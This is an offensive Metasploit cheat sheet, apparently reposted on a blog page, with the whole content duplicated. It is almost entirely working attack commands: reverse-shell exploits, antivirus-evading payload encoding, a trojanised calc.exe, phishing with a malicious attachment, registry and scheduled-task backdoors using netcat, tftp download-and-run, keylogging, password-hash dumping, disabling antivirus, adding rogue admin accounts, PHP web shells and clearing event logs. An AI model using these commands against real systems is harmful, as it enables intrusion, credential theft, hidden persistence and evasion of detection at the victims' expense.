# Fix database issue
root@kali:~# service postgresql start; service metasploit start
root@kali:~# su postgres
postgres@kali:~$ createuser lee -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@kali:~$ createdb --owner=lee msf
postgres@kali:~$ exit
exit
root@kali:~# msfconsole
msf > db_connect lee:<password>@127.0.0.1:5432/msf
msf > hosts
------------------------------------------------------------------------------------------------------
# msfcli
msfcli -h
All options are case-sensitive.
msfcli exploit/multi/samba/usermap_script RHOST=10.0.0.20 PAYLOAD=cmd/unix/reverse LHOST=10.0.0.5 E
If you are not sure about what options belong to a particular module, you can append the letter 'O' to the end of the string.
msfcli exploit/multi/samba/usermap_script O
To display the payloads that are available for the current module, append the letter 'P' to the end of the string.
msfcli exploit/multi/samba/usermap_script P
------------------------------------------------------------------------------------------------------
# msfconsole
msfconsole
help or ? List available commands and their descriptions.
------------------------------------------------------------------------------------------------------
# Using Exploits
use <exploit>
show targets
show payloads
show options
show advanced
show evasion
------------------------------------------------------------------------------------------------------
# Active Exploits
exploit -j Force an active module to the background.
Use a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
use exploit/windows/smb/psexec
set RHOST 10.0.0.20
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
set SMBUSER victim
set SMBPASS s3cr3t
exploit
------------------------------------------------------------------------------------------------------
# Passive Exploits
sessions -l Show active sessions.
sessions -i 2 Interact with session 2.
Animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
use exploit/windows/browser/ani_loadimage_chunksize
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
exploit
------------------------------------------------------------------------------------------------------
# Generating Payloads
List all the payloads available, you can do the following (also the same for listing encoders, nops, or all):
./msfvenom -l payloads
Generating a windows/meterpreter/reverse_tcp:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
Generate a payload that avoids certain bad characters:
./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'
Generate a payload with a specific encoder, and then encode 3 times:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
Inject a payload to calc.exe, and save it as new.exe
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe
------------------------------------------------------------------------------------------------------
# Database
root@kali:~# service postgresql start Start up the postgresql server before using the database.
root@kali:~# service metasploit start Create a msf3 datauser user and database called msf3.
root@kali:~# msfconsole
msf > help database
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
services -p 22 List specific ports.
services -s http List specific services.
workspace List workspaces.
* default * shows the active workspace.
client1
client5
workspace client1 Switch workspace.
workspace List workspaces.
default
* client1 * shows the active workspace.
client5
workspace -a [name] Add workspace(s).
workspace -d [name] Delete workspace(s).
workspace -r <old> <new> Rename workspace.
------------------------------------------------------------------------------------------------------
# Apache Tomcat Manager Common Administrative Credentials
use multi/tomcat_mgr_deploy
show options
set password admin
set username admin
set RHOST <target IP>
set RPORT <target port>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------
# Persistance
Example 1
Upload netcat.
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\
Check for anything the runs at startup.
meterpreter > reg enumkey -k HKLM\\software\\windows\\currentversion\\run
Add a registry key.
meterpreter > reg setval -k HKLM\\software\\windows\\currentversion\\run -v netcat -d ‘c:\windows\system32\nc.exe -ldp 4444 -e cmd.exe'
Verify changes to the registry.
meterpreter > reg queryval -k HKLM\\software\\windows\\currentversion\\run -v netcat
Reboot the target system.
meterpreter > reboot
Connect to target system - option 1
nc -vn <target IP> 4444
Connect to target system - option 2
use multi/handler
set PAYLOAD windows/shell_bind_tcp
set RHOST <target IP>
exploit
Example 2
meterpreter > run metsvc
Note the port that is used.
use multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT <port>
set RHOST <target IP>
exploit
------------------------------------------------------------------------------------------------------
# Phishing
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set EnableStageEncoding true
set ExitOnSession false
set LPORT 22
exploit -j
sendEmail -t ceo@target.com -f hacker@gmail.com -s <target IP> -u Salaries -a /root/Desktop/salaries.pdf
------------------------------------------------------------------------------------------------------
# Meterpreter - Pivoting
meterpreter > ipconfig
192.168.0.10
255.255.255.0
10.0.0.5
255.255.255.0
meterpreter > run arp_scanner -r 10.10.10.1/24
10.0.0.1
10.0.0.2
10.0.0.5
10.0.0.20
meterpreter > background
route add 10.0.0.1 255.255.255.0 x Where x is the meterpreter session number.
route print
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.20
set PORTS 1-200
set THREADS 255
exploit
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.20
set PAYLOAD windows/meterpreter/bind_tcp
exploit
------------------------------------------------------------------------------------------------------
# Meterpreter - Post Exploitation
ipconfig Look for dual-homed connections.
autoroute -s <new CIDR range> If dual-homed.
autoroute -p Print routing table.
netstat
getpid Show the current process ID.
ps Show running processes.
migrate Create a new process and migrate to it.
migrate <pid> Migrate to a specific process.
sysinfo Show system info.
getuid Show current privileges.
getprivs Escalate privileges if not NT AUTHORITY\SYSTEM.
getsystem If this fails: run post/windows/escalate/bypassuac.
getuid Privileges should now be NT AUTHORITY\SYSTEM.
screenshot Take a photo of the desktop.
hashdump Dump password hashes.
enum_logged_on_users
search -d c:\\documents\ and\ settings\\<user>\\ -f *.pdf
run getgui -u hacker -p password
use incognito
list_tokens -u
impersonate_token <domain>\\<user>
shell
route
net user List local users.
net accounts List local password policy.
net user hacker password /add /domain Try to add a new domain account.
net user hacker password /add Add a new local account.
net localgroup Administrators hacker /add Add new account to the local Administrators Security Group
net localgroup Administrators Verify account is in the group.
clearev Clear event logs.
------------------------------------------------------------------------------------------------------
# Meterpreter - Add User Account
add_user hacker password -h <target IP>
add_group_user "Domain Admins" hacker -h <target IP>
------------------------------------------------------------------------------------------------------
# MS08-067
use exploit/windows/smb/ms08_067_netapi
set THREADS 25
check <CIDR>
------------------------------------------------------------------------------------------------------
# psexec
use windows/smb/psexec
set RHOST <target IP>
set SMBPass <Administrator hash from another target>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------
# Web shell php meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 -f raw > evil.php
Upload file to target web server.
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.0.0.5
exploit
Execute evil.php on web server.
------------------------------------------------------------------------------------------------------
=== Below here are OLD notes that have NOT been organized. ===
(Open a new tab in Konsole)
cp /pentest/windows-binaries/passwd-attack/fgdump.exe /tmp/
cp /pentest/windows-binaries/passwd-attack/cachedump.exe /tmp/
(Go back to the Metasploit tab)
upload /tmp/fgdump.exe c:\\
Note: If the AV recognizes the file, your meterpreter session will end.
Re-exploit the box and upload cachedump.exe.
If upload is successful
shell Drop into a Windows shell.
cd \ Change to root directory.
==========
idletime
if time < 5 min
keyscan_start Start the keylogger.
keyscan_stop Stop the keylogger.
keyscan_dump Dump keystrokes.
run vnc
if the screen is locked exit VNC
meterpreter > run screen_unlock
meterpreter > run get_application_list
meterpreter > run winenum
shell Drop into a Windows shell.
(from a Windows shell)
net user Show user accounts.
net accounts Show password policies.
net user hacker password /add Add a new account called ciphent with the password ciphent.
net localgroup Administrators hacker /add Add the new account to the Administrators security group.
net localgroup Administrators
ipconfig
[take screen shot]
exit
meterpreter > clearev
meterpreter > exit
==========
# Malicious USB Drive
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai > evil.exe
msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=10.0.0.5 LPORT=443 > evil.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 R | msfencode -b "/x00" -t exe -e x86/shikata_ga_nai -c 6 -o evil.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.0.0.5
set LPORT 443
set ExitOnSession false
exploit -j
==========
upload <local path> <remote path>
upload /root/putty.exe C:\\Documents\ and\ Settings\\Administrator\Desktop\
==========
run checkvm
run getcountermeasure
run get_local_subnets
run killav
run getgui -e
<open a new tab>
rdesktop <target IP>
run gettelnet -u root -p toor
<open a new tab>
telnet <target IP>
root
toor
dir
==========
run persistence -r <attacker IP> -p 443 -A -x -i 100
background
sessions
(notice the new session opened)
sessions -i <new session Id>
ls
getuid
run winenum
(open a new tab)
cd .msf3/logs/winenum
ls
cd <target name>
ls
==========
use sniffer
help
sniffer_interfaces
sniffer_start 1
(let run for a while)
sniffer_stats 1
sniffer_dump 1 /root/tmp.cap
sniffer_stop 1
(open the cap file with Wireshark)
run scheduleme -m 1 -u -e /root/test.exe
==========
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 21
set ExitOnSession false
# set AutoRunScript path to script you want to autorun after exploit is fired
set AutoRunScript persistence -r <target IP> -p 21 -A -X -i 30
exploit -j -z
==========
# Shows all the scripts
run <tab>
==========
# Find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
# Alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
# Alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
==========
# An example of a run of the file to download via tftp of netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
==========
run getgui
run killav
run winemun
run memdump
run screen_unlock
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
==========
# Using payload as a backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\evil.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\evil.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\evil.exe" /ED 11/11/2011
==========
set options "InitialAutoRunScript=migrate -f", "AutoRunScript=post/multi/gather/run_console_rc_file RESOURCE=/opt/scripts/resource/post.rc
==========
auxiliary(mssql_sql) > set sql EXEC sp_addlogin hacker, password;EXEC master.dbo.sp_addsrvrolemember hacker, sysadmin; —priv
Metasploit
# Fix database issue
root@kali:~# service postgresql start; service metasploit start
root@kali:~# su postgres
postgres@kali:~$ createuser lee -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@kali:~$ createdb --owner=lee msf
postgres@kali:~$ exit
exit
root@kali:~# msfconsole
msf > db_connect lee:<password>@127.0.0.1:5432/msf
msf > hosts
------------------------------------------------------------------------------------------------------
# msfcli
msfcli -h
All options are case-sensitive.
msfcli exploit/multi/samba/usermap_script RHOST=10.0.0.20 PAYLOAD=cmd/unix/reverse LHOST=10.0.0.5 E
If you are not sure about what options belong to a particular module, you can append the letter 'O' to the end of the string.
msfcli exploit/multi/samba/usermap_script O
To display the payloads that are available for the current module, append the letter 'P' to the end of the string.
msfcli exploit/multi/samba/usermap_script P
------------------------------------------------------------------------------------------------------
# msfconsole
msfconsole
help or ? List available commands and their descriptions.
------------------------------------------------------------------------------------------------------
# Using Exploits
use <exploit>
show targets
show payloads
show options
show advanced
show evasion
------------------------------------------------------------------------------------------------------
# Active Exploits
exploit -j Force an active module to the background.
Use a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
use exploit/windows/smb/psexec
set RHOST 10.0.0.20
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
set SMBUSER victim
set SMBPASS s3cr3t
exploit
------------------------------------------------------------------------------------------------------
# Passive Exploits
sessions -l Show active sessions.
sessions -i 2 Interact with session 2.
Animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
use exploit/windows/browser/ani_loadimage_chunksize
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
exploit
------------------------------------------------------------------------------------------------------
# Generating Payloads
List all the payloads available, you can do the following (also the same for listing encoders, nops, or all):
./msfvenom -l payloads
Generating a windows/meterpreter/reverse_tcp:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
Generate a payload that avoids certain bad characters:
./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'
Generate a payload with a specific encoder, and then encode 3 times:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
Inject a payload to calc.exe, and save it as new.exe
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe
------------------------------------------------------------------------------------------------------
# Database
root@kali:~# service postgresql start Start up the postgresql server before using the database.
root@kali:~# service metasploit start Create a msf3 datauser user and database called msf3.
root@kali:~# msfconsole
msf > help database
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
services -p 22 List specific ports.
services -s http List specific services.
workspace List workspaces.
* default * shows the active workspace.
client1
client5
workspace client1 Switch workspace.
workspace List workspaces.
default
* client1 * shows the active workspace.
client5
workspace -a [name] Add workspace(s).
workspace -d [name] Delete workspace(s).
workspace -r <old> <new> Rename workspace.
------------------------------------------------------------------------------------------------------
# Apache Tomcat Manager Common Administrative Credentials
use multi/tomcat_mgr_deploy
show options
set password admin
set username admin
set RHOST <target IP>
set RPORT <target port>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------
# Persistance
Example 1
Upload netcat.
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\
Check for anything the runs at startup.
meterpreter > reg enumkey -k HKLM\\software\\windows\\currentversion\\run
Add a registry key.
meterpreter > reg setval -k HKLM\\software\\windows\\currentversion\\run -v netcat -d ‘c:\windows\system32\nc.exe -ldp 4444 -e cmd.exe'
Verify changes to the registry.
meterpreter > reg queryval -k HKLM\\software\\windows\\currentversion\\run -v netcat
Reboot the target system.
meterpreter > reboot
Connect to target system - option 1
nc -vn <target IP> 4444
Connect to target system - option 2
use multi/handler
set PAYLOAD windows/shell_bind_tcp
set RHOST <target IP>
exploit
Example 2
meterpreter > run metsvc
Note the port that is used.
use multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT <port>
set RHOST <target IP>
exploit
------------------------------------------------------------------------------------------------------
# Phishing
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set EnableStageEncoding true
set ExitOnSession false
set LPORT 22
exploit -j
sendEmail -t ceo@target.com -f hacker@gmail.com -s <target IP> -u Salaries -a /root/Desktop/salaries.pdf
------------------------------------------------------------------------------------------------------
# Meterpreter - Pivoting
meterpreter > ipconfig
192.168.0.10
255.255.255.0
10.0.0.5
255.255.255.0
meterpreter > run arp_scanner -r 10.10.10.1/24
10.0.0.1
10.0.0.2
10.0.0.5
10.0.0.20
meterpreter > background
route add 10.0.0.1 255.255.255.0 x Where x is the meterpreter session number.
route print
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.20
set PORTS 1-200
set THREADS 255
exploit
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.20
set PAYLOAD windows/meterpreter/bind_tcp
exploit
------------------------------------------------------------------------------------------------------
# Meterpreter - Post Exploitation
ipconfig Look for dual-homed connections.
autoroute -s <new CIDR range> If dual-homed.
autoroute -p Print routing table.
netstat
getpid Show the current process ID.
ps Show running processes.
migrate Create a new process and migrate to it.
migrate <pid> Migrate to a specific process.
sysinfo Show system info.
getuid Show current privileges.
getprivs Escalate privileges if not NT AUTHORITY\SYSTEM.
getsystem If this fails: run post/windows/escalate/bypassuac.
getuid Privileges should now be NT AUTHORITY\SYSTEM.
screenshot Take a photo of the desktop.
hashdump Dump password hashes.
enum_logged_on_users
search -d c:\\documents\ and\ settings\\<user>\\ -f *.pdf
run getgui -u hacker -p password
use incognito
list_tokens -u
impersonate_token <domain>\\<user>
shell
route
net user List local users.
net accounts List local password policy.
net user hacker password /add /domain Try to add a new domain account.
net user hacker password /add Add a new local account.
net localgroup Administrators hacker /add Add new account to the local Administrators Security Group
net localgroup Administrators Verify account is in the group.
clearev Clear event logs.
------------------------------------------------------------------------------------------------------
# Meterpreter - Add User Account
add_user hacker password -h <target IP>
add_group_user "Domain Admins" hacker -h <target IP>
------------------------------------------------------------------------------------------------------
# MS08-067
use exploit/windows/smb/ms08_067_netapi
set THREADS 25
check <CIDR>
------------------------------------------------------------------------------------------------------
# psexec
use windows/smb/psexec
set RHOST <target IP>
set SMBPass <Administrator hash from another target>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------
# Web shell php meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 -f raw > evil.php
Upload file to target web server.
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.0.0.5
exploit
Execute evil.php on web server.
------------------------------------------------------------------------------------------------------
=== Below here are OLD notes that have NOT been organized. ===
(Open a new tab in Konsole)
cp /pentest/windows-binaries/passwd-attack/fgdump.exe /tmp/
cp /pentest/windows-binaries/passwd-attack/cachedump.exe /tmp/
(Go back to the Metasploit tab)
upload /tmp/fgdump.exe c:\\
Note: If the AV recognizes the file, your meterpreter session will end.
Re-exploit the box and upload cachedump.exe.
If upload is successful
shell Drop into a Windows shell.
cd \ Change to root directory.
==========
idletime
if time < 5 min
keyscan_start Start the keylogger.
keyscan_stop Stop the keylogger.
keyscan_dump Dump keystrokes.
run vnc
if the screen is locked exit VNC
meterpreter > run screen_unlock
meterpreter > run get_application_list
meterpreter > run winenum
shell Drop into a Windows shell.
(from a Windows shell)
net user Show user accounts.
net accounts Show password policies.
net user hacker password /add Add a new account called ciphent with the password ciphent.
net localgroup Administrators hacker /add Add the new account to the Administrators security group.
net localgroup Administrators
ipconfig
[take screen shot]
exit
meterpreter > clearev
meterpreter > exit
==========
# Malicious USB Drive
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai > evil.exe
msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=10.0.0.5 LPORT=443 > evil.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 R | msfencode -b "/x00" -t exe -e x86/shikata_ga_nai -c 6 -o evil.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.0.0.5
set LPORT 443
set ExitOnSession false
exploit -j
==========
upload <local path> <remote path>
upload /root/putty.exe C:\\Documents\ and\ Settings\\Administrator\Desktop\
==========
run checkvm
run getcountermeasure
run get_local_subnets
run killav
run getgui -e
<open a new tab>
rdesktop <target IP>
run gettelnet -u root -p toor
<open a new tab>
telnet <target IP>
root
toor
dir
==========
run persistence -r <attacker IP> -p 443 -A -x -i 100
background
sessions
(notice the new session opened)
sessions -i <new session Id>
ls
getuid
run winenum
(open a new tab)
cd .msf3/logs/winenum
ls
cd <target name>
ls
==========
use sniffer
help
sniffer_interfaces
sniffer_start 1
(let run for a while)
sniffer_stats 1
sniffer_dump 1 /root/tmp.cap
sniffer_stop 1
(open the cap file with Wireshark)
run scheduleme -m 1 -u -e /root/test.exe
==========
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 21
set ExitOnSession false
# set AutoRunScript path to script you want to autorun after exploit is fired
set AutoRunScript persistence -r <target IP> -p 21 -A -X -i 30
exploit -j -z
==========
# Shows all the scripts
run <tab>
==========
# Find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
# Alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
# Alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
==========
# An example of a run of the file to download via tftp of netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
==========
run getgui
run killav
run winemun
run memdump
run screen_unlock
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
==========
# Using payload as a backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\evil.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\evil.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\evil.exe" /ED 11/11/2011
==========
set options "InitialAutoRunScript=migrate -f", "AutoRunScript=post/multi/gather/run_console_rc_file RESOURCE=/opt/scripts/resource/post.rc
==========
auxiliary(mssql_sql) > set sql EXEC sp_addlogin hacker, password;EXEC master.dbo.sp_addsrvrolemember hacker, sysadmin; —priv
run
==========
getgui will not work on Windows 2000 Server. Instead try: set PAYLOAD windows/vncinject/reverse_tcp
For injecting into memory: use exploit/windows/local/payload_inject
run
==========
getgui will not work on Windows 2000 Server. Instead try: set PAYLOAD windows/vncinject/reverse_tcp
For injecting into memory: use exploit/windows/local/payload_inject
Tidak ada komentar:
Posting Komentar